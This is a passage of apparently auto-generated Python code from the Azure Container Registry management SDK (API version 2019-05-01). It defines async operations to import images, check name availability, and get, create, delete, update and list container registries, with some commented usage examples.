:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_import_image(
self,
resource_group_name: str,
registry_name: str,
parameters: Union[_models.ImportImageParameters, IO],
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Copies an image to this container registry from the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param parameters: The parameters specifying the image to copy and the source container
        registry. Is either a model type or an IO type. Required.
:type parameters: ~azure.mgmt.containerregistry.v2019_05_01.models.ImportImageParameters or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._import_image_initial( # type: ignore
resource_group_name=resource_group_name,
registry_name=registry_name,
parameters=parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_import_image.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/importImage"
}
@overload
async def check_name_availability(
self,
registry_name_check_request: _models.RegistryNameCheckRequest,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.RegistryNameStatus:
"""Checks whether the container registry name is available for use. The name must contain only
alphanumeric characters, be globally unique, and between 5 and 50 characters in length.
:param registry_name_check_request: The object containing information for the availability
request. Required.
:type registry_name_check_request:
~azure.mgmt.containerregistry.v2019_05_01.models.RegistryNameCheckRequest
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryNameStatus or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryNameStatus
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def check_name_availability(
self, registry_name_check_request: IO, *, content_type: str = "application/json", **kwargs: Any
) -> _models.RegistryNameStatus:
"""Checks whether the container registry name is available for use. The name must contain only
alphanumeric characters, be globally unique, and between 5 and 50 characters in length.
:param registry_name_check_request: The object containing information for the availability
request. Required.
:type registry_name_check_request: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryNameStatus or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryNameStatus
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def check_name_availability(
self, registry_name_check_request: Union[_models.RegistryNameCheckRequest, IO], **kwargs: Any
) -> _models.RegistryNameStatus:
"""Checks whether the container registry name is available for use. The name must contain only
alphanumeric characters, be globally unique, and between 5 and 50 characters in length.
:param registry_name_check_request: The object containing information for the availability
        request. Is either a model type or an IO type. Required.
:type registry_name_check_request:
~azure.mgmt.containerregistry.v2019_05_01.models.RegistryNameCheckRequest or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryNameStatus or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryNameStatus
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.RegistryNameStatus] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(registry_name_check_request, (IO, bytes)):
_content = registry_name_check_request
else:
_json = self._serialize.body(registry_name_check_request, "RegistryNameCheckRequest")
request = build_check_name_availability_request(
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.check_name_availability.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("RegistryNameStatus", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_name_availability.metadata = {
"url": "/subscriptions/{subscriptionId}/providers/Microsoft.ContainerRegistry/checkNameAvailability"
}
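# Illustrative usage sketch (not part of the generated code). It assumes this
# operations class is exposed as ``client.registries`` on an asynchronous
# ContainerRegistryManagementClient; the credential/client wiring is an
# assumption and is not shown in this file:
#
#     status = await client.registries.check_name_availability(
#         {"name": "myregistry"}
#     )
#     print(status.name_available, status.reason, status.message)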
@distributed_trace_async
async def get(self, resource_group_name: str, registry_name: str, **kwargs: Any) -> _models.Registry:
"""Gets the properties of the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Registry or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.Registry
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[_models.Registry] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("Registry", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
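# Illustrative usage sketch (same assumptions as the sketch above):
#
#     registry = await client.registries.get("my-rg", "myregistry")
#     print(registry.login_server, registry.provisioning_state)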
async def _create_initial(
self, resource_group_name: str, registry_name: str, registry: Union[_models.Registry, IO], **kwargs: Any
) -> _models.Registry:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Registry] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(registry, (IO, bytes)):
_content = registry
else:
_json = self._serialize.body(registry, "Registry")
request = build_create_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._create_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("Registry", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("Registry", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_create_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
@overload
async def begin_create(
self,
resource_group_name: str,
registry_name: str,
registry: _models.Registry,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Registry]:
"""Creates a container registry with the specified parameters.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param registry: The parameters for creating a container registry. Required.
:type registry: ~azure.mgmt.containerregistry.v2019_05_01.models.Registry
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Registry or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_create(
self,
resource_group_name: str,
registry_name: str,
registry: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Registry]:
"""Creates a container registry with the specified parameters.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param registry: The parameters for creating a container registry. Required.
:type registry: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Registry or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_create(
self, resource_group_name: str, registry_name: str, registry: Union[_models.Registry, IO], **kwargs: Any
) -> AsyncLROPoller[_models.Registry]:
"""Creates a container registry with the specified parameters.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param registry: The parameters for creating a container registry. Is either a model type or
an IO type. Required.
:type registry: ~azure.mgmt.containerregistry.v2019_05_01.models.Registry or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Registry or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Registry] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._create_initial(
resource_group_name=resource_group_name,
registry_name=registry_name,
registry=registry,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("Registry", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
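# Illustrative usage sketch (same assumptions as above). ``begin_create``
# returns an AsyncLROPoller; awaiting ``poller.result()`` yields the final
# Registry once the long-running operation finishes:
#
#     poller = await client.registries.begin_create(
#         "my-rg",
#         "myregistry",
#         {"location": "eastus", "sku": {"name": "Basic"}},
#     )
#     registry = await poller.result()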
async def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, registry_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
@distributed_trace_async
async def begin_delete(self, resource_group_name: str, registry_name: str, **kwargs: Any) -> AsyncLROPoller[None]:
"""Deletes a container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
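# Illustrative usage sketch (same assumptions as above); the poller resolves
# to None because a successful delete returns no body:
#
#     poller = await client.registries.begin_delete("my-rg", "myregistry")
#     await poller.result()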
async def _update_initial(
self,
resource_group_name: str,
registry_name: str,
registry_update_parameters: Union[_models.RegistryUpdateParameters, IO],
**kwargs: Any
) -> _models.Registry:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Registry] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(registry_update_parameters, (IO, bytes)):
_content = registry_update_parameters
else:
_json = self._serialize.body(registry_update_parameters, "RegistryUpdateParameters")
request = build_update_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("Registry", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("Registry", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
@overload
async def begin_update(
self,
resource_group_name: str,
registry_name: str,
registry_update_parameters: _models.RegistryUpdateParameters,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Registry]:
"""Updates a container registry with the specified parameters.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param registry_update_parameters: The parameters for updating a container registry. Required.
:type registry_update_parameters:
~azure.mgmt.containerregistry.v2019_05_01.models.RegistryUpdateParameters
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Registry or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_update(
self,
resource_group_name: str,
registry_name: str,
registry_update_parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Registry]:
"""Updates a container registry with the specified parameters.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param registry_update_parameters: The parameters for updating a container registry. Required.
:type registry_update_parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Registry or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_update(
self,
resource_group_name: str,
registry_name: str,
registry_update_parameters: Union[_models.RegistryUpdateParameters, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.Registry]:
"""Updates a container registry with the specified parameters.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param registry_update_parameters: The parameters for updating a container registry. Is either
a model type or an IO type. Required.
:type registry_update_parameters:
~azure.mgmt.containerregistry.v2019_05_01.models.RegistryUpdateParameters or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Registry or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Registry] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
registry_name=registry_name,
registry_update_parameters=registry_update_parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("Registry", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
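# Illustrative usage sketch (same assumptions as above); the update model
# accepts partial settings, e.g. toggling the admin user:
#
#     poller = await client.registries.begin_update(
#         "my-rg", "myregistry", {"admin_user_enabled": True}
#     )
#     registry = await poller.result()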
@distributed_trace
def list_by_resource_group(self, resource_group_name: str, **kwargs: Any) -> AsyncIterable["_models.Registry"]:
"""Lists all the container registries under the specified resource group.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either Registry or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[_models.RegistryListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_by_resource_group.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("RegistryListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list_by_resource_group.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries"
}
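# Illustrative usage sketch (same assumptions as above); the AsyncItemPaged
# returned here follows next_link paging transparently:
#
#     async for registry in client.registries.list_by_resource_group("my-rg"):
#         print(registry.name)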
@distributed_trace
